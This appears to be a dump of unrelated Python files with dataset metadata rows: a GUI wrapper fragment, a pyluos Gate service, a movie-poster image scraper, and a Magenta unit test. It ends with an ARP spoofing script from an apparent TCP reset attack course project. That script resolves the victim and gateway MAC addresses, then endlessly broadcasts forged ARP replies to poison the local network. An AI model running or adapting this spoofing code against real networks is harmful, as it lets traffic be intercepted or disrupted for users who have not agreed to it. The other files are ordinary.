    """Read-only wrapper around a collection of GUI elements."""

    def __init__(self, elements):
        # Backing sequence of elements; never mutated by this class.
        self._elements = elements

    def get_instance_count(self):
        """Return the number of wrapped elements."""
        return len(self._elements)

    def get_element_at_index(self, index):
        """Return the element at `index` (errors propagate from the backing sequence)."""
        return self._elements[index]
d094758bef48cde069cc95bd39d43aa1e492ad78 | 363 | py | Python | pyluos/services/gate.py | BHAY-3DiTex/Pyluos | c3285e5378860679236cb6b97981d66a24aeefa8 | [
"MIT"
] | 16 | 2020-03-22T11:21:17.000Z | 2022-01-04T08:45:20.000Z | pyluos/services/gate.py | BHAY-3DiTex/Pyluos | c3285e5378860679236cb6b97981d66a24aeefa8 | [
"MIT"
] | 32 | 2020-03-20T17:06:55.000Z | 2022-02-28T12:59:42.000Z | pyluos/services/gate.py | Luos-io/pyluos | ff90e129159ae0569c0b82a49ee5c0de9914441f | [
"MIT"
] | 9 | 2020-06-07T09:52:13.000Z | 2021-12-07T00:41:29.000Z | from .service import Service
class Gate(Service):
    """Pyluos service wrapper for a Gate module (the serial/Wi-Fi bridge)."""

    def __init__(self, id, alias, device):
        Service.__init__(self, 'Gate', id, alias, device)

    def _update(self, new_state):
        # No gate-specific state; just delegate to the base service update.
        Service._update(self, new_state)

    def control(self):
        def delay(delay):
            self._value = delay

        # BUG FIX: `return interact(...)` was indented inside `delay`, so
        # control() always returned None and the slider widget was never
        # built.  It must run at control() level, wiring the slider
        # (0..100, step 1) to the `delay` callback.
        return interact(delay, delay=(0, 100, 1))
| 21.352941 | 57 | 0.619835 |
91cca7cc5ad731c27f326210514d0e230b06af71 | 1,019 | py | Python | webscraping_basic/11_daum_movies.py | tunealog/python-web-scraping | 0d625fb610f5a0979a008c2e2c9ddd31d8ef9c17 | [
"MIT"
] | null | null | null | webscraping_basic/11_daum_movies.py | tunealog/python-web-scraping | 0d625fb610f5a0979a008c2e2c9ddd31d8ef9c17 | [
"MIT"
] | null | null | null | webscraping_basic/11_daum_movies.py | tunealog/python-web-scraping | 0d625fb610f5a0979a008c2e2c9ddd31d8ef9c17 | [
"MIT"
] | null | null | null | # Python Web Scraping
# Title : Image Scraping
# Date : 2020-08-24
# Creator : tunealog
import requests
from bs4 import BeautifulSoup
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15"}
for year in range(2015, 2020):
url = "https://search.daum.net/search?w=tot&q={}๋
์ํ์์&DA=MOR&rtmaxcoll=MOR".format(
year)
res = requests.get(url, headers=headers)
res.raise_for_status()
soup = BeautifulSoup(res.text, "lxml")
images = soup.find_all("img", attrs={"class": "thumb_img"})
for idx, image in enumerate(images):
image_url = image["src"]
if image_url.startswith("//"):
image_url = "https:" + image_url
print(image_url)
image_res = requests.get(image_url)
image_res.raise_for_status()
with open("movie_{}_{}.jpg".format(year, idx+1), "wb") as f:
f.write(image_res.content)
if idx >= 4:
break
| 28.305556 | 140 | 0.627085 |
24c7ba529dc86db71bae6d272afe936e985f55ff | 2,184 | py | Python | magenta/pipelines/pipelines_common_test.py | fanzhiyan/magenta | 622c47c19bb84c6f57b286ed03b738516b2f27d6 | [
"Apache-2.0"
] | 16 | 2016-09-02T04:59:30.000Z | 2022-01-11T10:38:29.000Z | magenta/pipelines/pipelines_common_test.py | fanzhiyan/magenta | 622c47c19bb84c6f57b286ed03b738516b2f27d6 | [
"Apache-2.0"
] | 2 | 2016-09-25T16:39:59.000Z | 2016-11-18T17:43:41.000Z | magenta/pipelines/pipelines_common_test.py | fanzhiyan/magenta | 622c47c19bb84c6f57b286ed03b738516b2f27d6 | [
"Apache-2.0"
] | 10 | 2016-09-02T04:59:32.000Z | 2021-09-29T06:57:24.000Z | # Copyright 2019 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for pipelines_common."""
import functools
from magenta.common import testing_lib as common_testing_lib
from magenta.pipelines import pipelines_common
import six
import tensorflow as tf
class PipelineUnitsCommonTest(tf.test.TestCase):
  """Tests for the pipeline units in pipelines_common."""

  def _unit_transform_test(self, unit, input_instance,
                           expected_outputs):
    """Assert that `unit.transform(input_instance)` matches expectations.

    Checks the output is a list set-equal to `expected_outputs`, and that the
    unit's declared input/output types agree with the actual instance types.
    """
    outputs = unit.transform(input_instance)
    self.assertTrue(isinstance(outputs, list))
    common_testing_lib.assert_set_equality(self, expected_outputs, outputs)
    self.assertEqual(unit.input_type, type(input_instance))
    if outputs:
      self.assertEqual(unit.output_type, type(outputs[0]))

  def testRandomPartition(self):
    """RandomPartition routes each input to exactly one named bucket."""
    random_partition = pipelines_common.RandomPartition(
        str, ['a', 'b', 'c'], [0.1, 0.4])
    # Deterministic "random" draws; `choices` lists the bucket each draw
    # should select given the [0.1, 0.4] split points (draw < 0.1 -> 'a',
    # < 0.4 -> 'b', else 'c').
    random_nums = [0.55, 0.05, 0.34, 0.99]
    choices = ['c', 'a', 'b', 'c']
    random_partition.rand_func = functools.partial(six.next, iter(random_nums))
    self.assertEqual(random_partition.input_type, str)
    self.assertEqual(random_partition.output_type,
                     {'a': str, 'b': str, 'c': str})
    for i, s in enumerate(['hello', 'qwerty', '1234567890', 'zxcvbnm']):
      results = random_partition.transform(s)
      self.assertTrue(isinstance(results, dict))
      self.assertEqual(set(results.keys()), set(['a', 'b', 'c']))
      self.assertEqual(len(results.values()), 3)
      # Exactly one bucket receives the input; the other two stay empty.
      self.assertEqual(len([l for l in results.values() if l == []]), 2)  # pylint: disable=g-explicit-bool-comparison
      self.assertEqual(results[choices[i]], [s])
if __name__ == '__main__':
  # Run all test methods in this module via the TensorFlow test runner.
  tf.test.main()
| 39 | 118 | 0.704212 |
950ede04e5607bce05d09ef576fdb31ce4087962 | 2,067 | py | Python | Python_Implementation/Test_Codes/ArpSpoofing.py | ishtiaqniloy/CSE_406_TCP_Reset_Attack_Video_Streaming | 849e3595a75cedaa8142a025eb22e1bb8871be36 | [
"MIT"
] | 2 | 2020-07-02T00:31:43.000Z | 2021-06-06T03:27:18.000Z | Python_Implementation/Test_Codes/ArpSpoofing.py | ishtiaqniloy/CSE_406_TCP_Reset_Attack_Video_Streaming | 849e3595a75cedaa8142a025eb22e1bb8871be36 | [
"MIT"
] | null | null | null | Python_Implementation/Test_Codes/ArpSpoofing.py | ishtiaqniloy/CSE_406_TCP_Reset_Attack_Video_Streaming | 849e3595a75cedaa8142a025eb22e1bb8871be36 | [
"MIT"
] | 1 | 2021-05-25T09:58:46.000Z | 2021-05-25T09:58:46.000Z | #!/usr/bin/python3
#running command: python ArpSpoofing.py victimIP
import sys #for command line argument
import time
import os
import shutil
import tempfile
from random import randint
from scapy.all import *
from scapy.layers.inet import *
import scapy
import socket
import uuid
def get_ip():
    """Return this host's primary outbound IPv4 address as a string.

    "Connects" a UDP socket to a dummy address (no packet is actually sent for
    a UDP connect) so the kernel selects the source address the default route
    would use, then reads it back with getsockname().  Falls back to
    127.0.0.1 if that fails.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # doesn't even have to be reachable
        s.connect(('10.255.255.255', 1))
        IP = s.getsockname()[0]
    except OSError:
        # BUG FIX: was a bare `except:` (also swallows KeyboardInterrupt /
        # SystemExit); narrowed to socket/OS errors, the only expected failures.
        IP = '127.0.0.1'
    finally:
        s.close()
    return IP
# Local interface facts: our IPv4 address and our MAC.  The MAC is rebuilt
# from uuid.getnode() by extracting one byte at a time and reversing to the
# conventional most-significant-first "aa:bb:cc:dd:ee:ff" order.
my_ip = get_ip()
my_mac = str(':'.join(['{:02x}'.format((uuid.getnode() >> ele) & 0xff)
                       for ele in range(0, 8 * 6, 8)][::-1]))

# Victim IPv4 address comes from the command line: python ArpSpoofing.py <ip>
victim_ip = sys.argv[1]
# victim_ip = "192.168.0.106" #for testing

# Derive the gateway (.1) and broadcast (.255) addresses from the victim's
# address, assuming a /24 network.
network_parts = str(victim_ip).split(".")
gateway = network_parts[0] + "." + network_parts[1] + "." + network_parts[2] + ".1"
broadcastNet = network_parts[0] + "." + network_parts[1] + "." + network_parts[2] + ".255"

# print(str(my_ip) + " " + str(victim_ip) + " " + gateway)

# Resolve the victim's MAC with an ARP who-has request (sr1 sends and blocks
# until the single reply arrives).
arp_packet = ARP(op=ARP.who_has, psrc=my_ip, pdst=victim_ip)
result = sr1(arp_packet)
victim_mac = result[ARP].hwsrc

# Resolve the gateway's MAC the same way.
arp_packet = ARP(op=ARP.who_has, psrc=my_ip, pdst=gateway)
result = sr1(arp_packet)
gateway_mac = result[ARP].hwsrc

#######################################################################################################################
# Poison the subnet: forge an ARP is-at reply claiming the victim's IP lives
# at OUR MAC, wrap it in a broadcast Ethernet frame, and re-send it forever.
reply = ARP(op=ARP.is_at, hwsrc=my_mac, psrc=victim_ip, hwdst="ff:ff:ff:ff:ff:ff", pdst=broadcastNet)
go = Ether(dst="ff:ff:ff:ff:ff:ff", src=my_mac) / reply
# send(go, verbose = 2, loop = 1)

# NOTE(review): infinite loop by design — the script never exits; stop with
# Ctrl-C.  victim_mac/gateway_mac are resolved above but never used here.
while 1:
    sendp(go, verbose = 2)
    # time.sleep(randint(1, 3))

#######################################################################################################################
# ip_packet = IP(ttl=64)
# ip_packet.dst = gateway
# ip_packet.src = victim_ip
# icmp_packet = ip_packet/ICMP()/"Hello World"
# send(icmp_packet, verbose = 2, loop = 1)
# while 1:
#     send(ARP(op=ARP.is_at, psrc=victim_ip, hwdst="255.255.255.255", pdst="192.168.0.255"), verbose = 2)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.